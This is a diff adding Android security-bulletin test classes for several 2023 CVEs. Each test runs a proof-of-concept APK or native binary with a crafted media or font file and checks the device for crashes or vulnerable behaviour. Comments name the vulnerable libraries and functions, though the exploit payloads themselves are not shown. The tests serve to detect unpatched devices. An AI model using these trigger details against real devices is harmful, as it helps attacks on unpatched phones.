+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.NativePocCrashAsserter.assertNoCrash;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.NativePoc;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.sts.common.util.TombstoneUtils;
+import com.android.sts.common.util.TombstoneUtils.Config.BacktraceFilterPattern;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21127 extends NonRootSecurityTestCase {
+
+    // b/275418191
+    // Vulnerability Behaviour : SIGSEGV in self
+    // Vulnerable Library      : libstagefright (As per AOSP code)
+    // Vulnerable Function     : readSampleData (As per AOSP code)
+    @AsbSecurityTest(cveBugId = 275418191)
+    @Test
+    public void testPocCVE_2023_21127() {
+        try {
+            // Create the crash config
+            String binary = "CVE-2023-21127";
+            String inputFile = "cve_2023_21127.ogg";
+            TombstoneUtils.Config crashConfig =
+                    new TombstoneUtils.Config()
+                            .setProcessPatterns(binary)
+                            .setBacktraceIncludes(
+                                    new BacktraceFilterPattern("libstagefright", "readSampleData"))
+                            .setSignals(TombstoneUtils.Signals.SIGSEGV);
+
+            // Build and run the Native PoC
+            NativePoc.builder()
+                    .pocName(binary)
+                    .args(inputFile)
+                    .resources(inputFile)
+                    .asserter(assertNoCrash(crashConfig))
+                    .build()
+                    .run(this);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21129.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21129.java
new file mode 100644
index 0000000..8e815fa
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21129.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21129 extends NonRootSecurityTestCase {
+
+    // b/274759612
+    // Vulnerable app    : SystemUI.apk
+    // Vulnerable module : com.android.systemui
+    @AsbSecurityTest(cveBugId = 274759612)
+    @Test
+    public void testPocCVE_2023_21129() {
+        try {
+            final String testPkg = "android.security.cts.CVE_2023_21129";
+
+            // install the app
+            installPackage("CVE-2023-21129.apk");
+
+            // give permission to post bubble notifications
+            AdbUtils.runCommandLine("cmd notification set_bubbles " + testPkg + " 1", getDevice());
+
+            runDeviceTests(testPkg, testPkg + ".DeviceTest", "testBubbleNotification");
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21144.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21144.java
new file mode 100644
index 0000000..064cfbc
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21144.java
@@ -0,0 +1,58 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21144 extends NonRootSecurityTestCase {
+
+    @AsbSecurityTest(cveBugId = 252766417)
+    @Test
+    public void testPocCVE_2023_21144() {
+        ITestDevice device = null;
+        try {
+            device = getDevice();
+            final String testPkg = "android.security.cts.CVE_2023_21144";
+            installPackage("CVE-2023-21144.apk", "-g");
+
+            // Allowing notification listener service for PocListenerService
+            device.executeShellCommand(
+                    "cmd notification allow_listener " + testPkg + "/.PocListenerService");
+
+            runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21144");
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            // To undo the expanded notification panel
+            try {
+                device.executeShellCommand("input keyevent KEYCODE_HOME");
+            } catch (Exception ignore) {
+                // Ignore
+            }
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21145.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21145.java
new file mode 100644
index 0000000..8c44a58
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21145.java
@@ -0,0 +1,81 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.ProcessUtil;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.RunUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.Optional;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21145 extends NonRootSecurityTestCase {
+    private final int mNoPidFound = -1; /* Default pid */
+
+    @AsbSecurityTest(cveBugId = 265293293)
+    @Test
+    public void testPocCVE_2023_21145() {
+        try {
+            ITestDevice device = getDevice();
+
+            // Install poc and start PipActivity to invoke the vulnerability
+            installPackage("CVE-2023-21145.apk");
+            String pocPkg = "android.security.cts.CVE_2023_21145";
+            device.executeShellCommand("am start-activity " + pocPkg + "/.PipActivity");
+
+            // Wait for the PoC to start
+            final int initialPid = waitAndGetPid(device, mNoPidFound /* initial pid */);
+            assumeTrue("PoC process did not start", initialPid != mNoPidFound);
+
+            // Wait for the PoC to be killed or restart
+            final int latestPid = waitAndGetPid(device, initialPid);
+            assumeTrue("PoC process did not die", latestPid != initialPid);
+
+            // Without fix, the process restarts with new pid
+            assertTrue("Device is vulnerable to b/265293293 !!", latestPid == mNoPidFound);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+
+    private int waitAndGetPid(ITestDevice device, int initialPid) throws Exception {
+        final long timeout = 10_000L;
+        final String processName = "android.security.cts.CVE_2023_21145:pipActivity";
+
+        // Check if pid has changed
+        int currentPid = mNoPidFound;
+        long startTime = System.currentTimeMillis();
+        while ((currentPid == mNoPidFound || currentPid == initialPid) // Check if pid has changed
+                && System.currentTimeMillis() - startTime <= timeout) {
+            Optional<Integer> pid = ProcessUtil.pidOf(device, processName);
+            currentPid = pid.isPresent() ? pid.get() : mNoPidFound;
+            RunUtil.getDefault().sleep(200); // Sleep for 200 ms before checking pid again
+        }
+        return currentPid;
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21238.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21238.java
new file mode 100644
index 0000000..714ace8
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21238.java
@@ -0,0 +1,90 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.IRunUtil;
+import com.android.tradefed.util.RunUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21238 extends NonRootSecurityTestCase {
+
+    @AsbSecurityTest(cveBugId = 277740848)
+    @Test
+    public void testPocCVE_2023_21238() {
+        try {
+            ITestDevice device = getDevice();
+            final String testPkg = "android.security.cts.CVE_2023_21238";
+
+            // Install test app in device
+            installPackage("CVE-2023-21238.apk", "-g");
+
+            // Create new user and save a screenshot in that user
+            final int currentUserId = device.getCurrentUser();
+            try (AutoCloseable asSecondaryUser =
+                    new UserUtils.SecondaryUser(device)
+                            .name("cve_2023_21238_user")
+                            .doSwitch()
+                            .withUser()) {
+                int userId = device.getCurrentUser();
+                device.executeShellCommand("input keyevent KEYCODE_SYSRQ");
+
+                // Wait for screenshot to get saved in the created user
+                final long timeout = 5_000L;
+                final long waitPerIteration = 500L;
+                boolean screenshotSaved = false;
+                IRunUtil runUtil = RunUtil.getDefault();
+                long start = System.currentTimeMillis();
+                do {
+                    screenshotSaved =
+                            device.executeShellCommand(
+                                            "content query --user "
+                                                    + userId
+                                                    + " --projection _id --uri"
+                                                    + " content://media/external/images/media/")
+                                    .contains("Row");
+                    if (screenshotSaved) {
+                        break;
+                    }
+                    runUtil.sleep(waitPerIteration);
+                } while (System.currentTimeMillis() - start <= timeout);
+                assumeTrue(
+                        "Screenshot was not saved in the created userId = " + userId,
+                        screenshotSaved);
+
+                // Switch back to original user
+                assumeTrue(device.switchUser(currentUserId));
+
+                // Run DeviceTest
+                runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21238");
+            }
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21239.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21239.java
new file mode 100644
index 0000000..986aee3
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21239.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21239 extends NonRootSecurityTestCase {
+
+    @AsbSecurityTest(cveBugId = 274592467)
+    @Test
+    public void testPocCVE_2023_21239() {
+        try {
+            ITestDevice device = getDevice();
+            final String testPkg = "android.security.cts.CVE_2023_21239";
+            installPackage("CVE-2023-21239.apk", "-g");
+
+            try (AutoCloseable asSecondaryUser =
+                    new UserUtils.SecondaryUser(device)
+                            .name("cve_2023_21239_user")
+                            .withUser()) {
+
+                // Run DeviceTest
+                runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCallStyleNotification");
+            }
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21244.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21244.java
new file mode 100644
index 0000000..c784851
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21244.java
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.SystemUtil;
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21244 extends NonRootSecurityTestCase {
+
+    // b/276729064
+    // Vulnerable module : framework.jar (Notification)
+    // Vulnerable app    : Not applicable
+    @AsbSecurityTest(cveBugId = 276729064)
+    @Test
+    public void testPocCVE_2023_21244() {
+        try {
+            ITestDevice device = getDevice();
+
+            // Install the test app
+            installPackage("CVE-2023-21244.apk", "-g");
+
+            // Enable "hidden_api_policy" to use the hidden APIs of the class RemoteInputHistoryItem
+            // and run the test with a new user
+            try (AutoCloseable asSecondaryUser =
+                            new UserUtils.SecondaryUser(device)
+                                    .name("cve_2023_21244_user")
+                                    .withUser();
+                    AutoCloseable withHiddenPolicy =
+                            SystemUtil.withSetting(device, "global", "hidden_api_policy", "1")) {
+                // Run the test "testCVE_2023_21244"
+                final String testPkg = "android.security.cts.CVE_2023_21244";
+                runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_21244");
+            }
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21253.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21253.java
new file mode 100644
index 0000000..957c459
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21253.java
@@ -0,0 +1,126 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.tradefed.util.CommandStatus.SUCCESS;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import static java.lang.String.format;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.CommandResult;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.ArrayList;
+import java.util.List;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21253 extends NonRootSecurityTestCase {
+    private final List<String> mAssumptionFailureList = new ArrayList<String>();
+    private final List<String> mFailureList = new ArrayList<String>();
+
+    @AsbSecurityTest(cveBugId = 266580022)
+    @Test
+    public void testPocCVE_2023_21253() {
+        try {
+            // Prebuilt apks used in this test are same as used in ApkVerifierTest.java. Dependence
+            // on prebuilt apks cannot be removed because with fix, apks with more than 10 signers
+            // cannot be built due to changes done in 'apksigner'.
+            final String v1Only10SignersApk = "v1-only-10-signers.apk";
+            final String v1Only11SignersApk = "v1-only-11-signers.apk";
+            final String v2Only10SignersApk = "v2-only-10-signers.apk";
+            final String v2Only11SignersApk = "v2-only-11-signers.apk";
+
+            // Check V1 apk signature scheme
+            checkApkSignerScheme(v1Only10SignersApk, v1Only11SignersApk, "V1 apk signature");
+
+            // Check V2 apk signature scheme
+            checkApkSignerScheme(v2Only10SignersApk, v2Only11SignersApk, "V2 apk signature");
+
+            // Fail the test if any failure strings are present in mFailureList
+            assertTrue(
+                    format(
+                            "Vulnerable to b/266580022! Failures are :- %s",
+                            mFailureList.toString()),
+                    mFailureList.isEmpty());
+
+            // Assumption failure if any exception messages are present in mAssumptionFailureList
+            assumeTrue(
+                    format("Exceptions occurred :- %s", mAssumptionFailureList.toString()),
+                    mAssumptionFailureList.isEmpty());
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+
+    private void checkApkSignerScheme(
+            String apkWith10Signers, String apkWith11Signers, String apkSignerScheme) {
+        try {
+            final CommandResult outputV1Only10 = installAndCheck(apkWith10Signers);
+            final CommandResult outputV1Only11 = installAndCheck(apkWith11Signers);
+            if (outputV1Only10.getStatus() != SUCCESS) {
+                // outputV1Only10 should be successful as it is expected that installation of an apk
+                // with 10 signers should be allowed
+                mAssumptionFailureList.add(
+                        format("Unable to install app %s with 10 signatures", apkWith10Signers));
+                return;
+            }
+            if (outputV1Only11.getStatus() == SUCCESS) {
+                // Add scheme to mFailureList if installation of an apk with 11 signers is
+                // successful
+                mFailureList.add(
+                        format(
+                                "%s scheme allows installation of apk %s with more than 10 signers",
+                                apkSignerScheme, apkWith11Signers));
+            }
+        } catch (Exception e) {
+            // Add exception occurred in mAssumptionFailureList. This is done to avoid test
+            // termination midway and ensure that both the schemes are checked
+            mAssumptionFailureList.add(
+                    format(
+                            "Exception %s occurred while checking %s apk signer scheme",
+                            e.getMessage(), apkSignerScheme));
+        }
+    }
+
+    private CommandResult installAndCheck(String apkName) throws Exception {
+        final ITestDevice device = getDevice();
+        final String apkPath = AdbUtils.TMP_PATH + apkName;
+        try {
+            // Push apk file to /data/local/tmp
+            AdbUtils.pushResource(AdbUtils.RESOURCE_ROOT + apkName, apkPath, device);
+
+            // Install apk
+            return device.executeShellV2Command("pm install " + apkPath);
+        } finally {
+            // Uninstall apk
+            device.executeShellV2Command("pm uninstall android.appsecurity.cts.tinyapp");
+
+            // Remove apk file from /data/local/tmp
+            AdbUtils.removeResources(new String[] {apkName}, AdbUtils.TMP_PATH, device);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21254.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21254.java
new file mode 100644
index 0000000..0155a9d
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21254.java
@@ -0,0 +1,47 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21254 extends NonRootSecurityTestCase {
+
+    @AsbSecurityTest(cveBugId = 254736794)
+    @Test
+    public void testPocCVE_2023_21254() {
+        try {
+            // Install test-app and helper-app
+            installPackage("CVE-2023-21254-test.apk");
+            installPackage("CVE-2023-21254-helper.apk");
+
+            // Run Device test
+            final String testPkg = "android.security.cts.CVE_2023_21254_test";
+            runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21254");
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21256.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21256.java
new file mode 100644
index 0000000..b367055
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21256.java
@@ -0,0 +1,85 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.device.UserInfo;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.testtype.junit4.DeviceTestRunOptions;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.Map;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21256 extends NonRootSecurityTestCase {
+
+    @AsbSecurityTest(cveBugId = 268193384)
+    @Test
+    public void testPocCVE_2023_21256() {
+        ITestDevice device = null;
+        int workUserId = -1;
+        try {
+            final String testPkg = "android.security.cts.CVE_2023_21256";
+            device = getDevice();
+
+            assumeTrue(device.isMultiUserSupported());
+
+            AdbUtils.runCommandLine(
+                    "pm create-user --profileOf 0 --managed CVE_2023_21256_work_user", device);
+
+            Map<Integer, UserInfo> mapOfUserInfos = device.getUserInfos();
+            for (UserInfo userInfo : mapOfUserInfos.values()) {
+                if (userInfo.userName().equals("CVE_2023_21256_work_user")) {
+                    workUserId = userInfo.userId();
+                }
+            }
+            assumeFalse(workUserId == -1);
+
+            assumeTrue(device.startUser(workUserId, true /* waitFlag */));
+
+            // Install the test app in work profile
+            installPackage("CVE-2023-21256.apk", "--user " + workUserId);
+
+            runDeviceTests(
+                    new DeviceTestRunOptions(testPkg)
+                            .setDevice(device)
+                            .setTestClassName(testPkg + ".DeviceTest")
+                            .setTestMethodName("testSettingsHomePageActivityFromWorkProfile")
+                            .setUserId(workUserId));
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            if (workUserId != -1) {
+                try {
+                    device.stopUser(workUserId, true /* waitFlag */, true /* forceFlag */);
+                    device.removeUser(workUserId);
+                } catch (Exception e) {
+                    // Ignore exceptions as the test has finished
+                }
+            }
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21260.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21260.java
new file mode 100644
index 0000000..175d914
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21260.java
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21260 extends NonRootSecurityTestCase {
+
+    // b/259384309
+    // Vulnerable module : CarSettings.apk
+    @AsbSecurityTest(cveBugId = 259384309)
+    @Test
+    public void testPocCVE_2023_21260() {
+        try {
+            final String FEATURE_AUTOMOTIVE = "android.hardware.type.automotive";
+
+            // Skip test for non-automotive builds
+            assumeTrue(
+                    "Skipping test: " + FEATURE_AUTOMOTIVE + " missing",
+                    hasDeviceFeature(FEATURE_AUTOMOTIVE));
+            final String testPkg = "android.security.cts.CVE_2023_21260";
+
+            // Install the test app
+            installPackage("CVE-2023-21260.apk");
+
+            // Run the test "testCVE_2023_21260"
+            runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_21260");
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            try {
+                AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", getDevice());
+            } catch (Exception ignored) {
+                // ignore all exceptions
+            }
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21261.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21261.java
new file mode 100644
index 0000000..d2c57f8
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21261.java
@@ -0,0 +1,72 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.NativePocCrashAsserter.assertNoCrash;
+import static com.android.sts.common.NativePocStatusAsserter.assertNotVulnerableExitCode;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.NativePoc;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.sts.common.util.TombstoneUtils;
+import com.android.sts.common.util.TombstoneUtils.Config.BacktraceFilterPattern;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+// CVE-2023-21261 includes fix for CVE-2022-27406.
+// Hence checking for both the vulnerabilties
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21261 extends NonRootSecurityTestCase {
+
+    // b/271680254
+    // Vulnerability Behaviour : SIGSEGV in self
+    // Vulnerable Library      : libft2.so (As per AOSP code)
+    // Vulnerable Function     : FT_Request_Size (As per AOSP code)
+    // Is Play managed         : No
+    @AsbSecurityTest(cveBugId = 271680254)
+    @Test
+    public void testPocCVE_2023_21261() {
+        try {
+            String binaryName = "CVE-2023-21261";
+            String inputFile = "cve_2023_21261.ttf";
+
+            TombstoneUtils.Config crashConfig =
+                    new TombstoneUtils.Config()
+                            .setProcessPatterns(binaryName)
+                            .setBacktraceIncludes(
+                                    new BacktraceFilterPattern("libft2.so", "FT_Request_Size"))
+                            .setSignals(TombstoneUtils.Signals.SIGSEGV)
+                            .setIgnoreLowFaultAddress(false);
+
+            // Running the PoC for CVE-2022-27406
+            NativePoc.builder()
+                    .pocName(binaryName)
+                    .args("CVE-2022-27406", inputFile)
+                    .resources(inputFile)
+                    .asserter(assertNoCrash(crashConfig))
+                    .build()
+                    .run(this);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
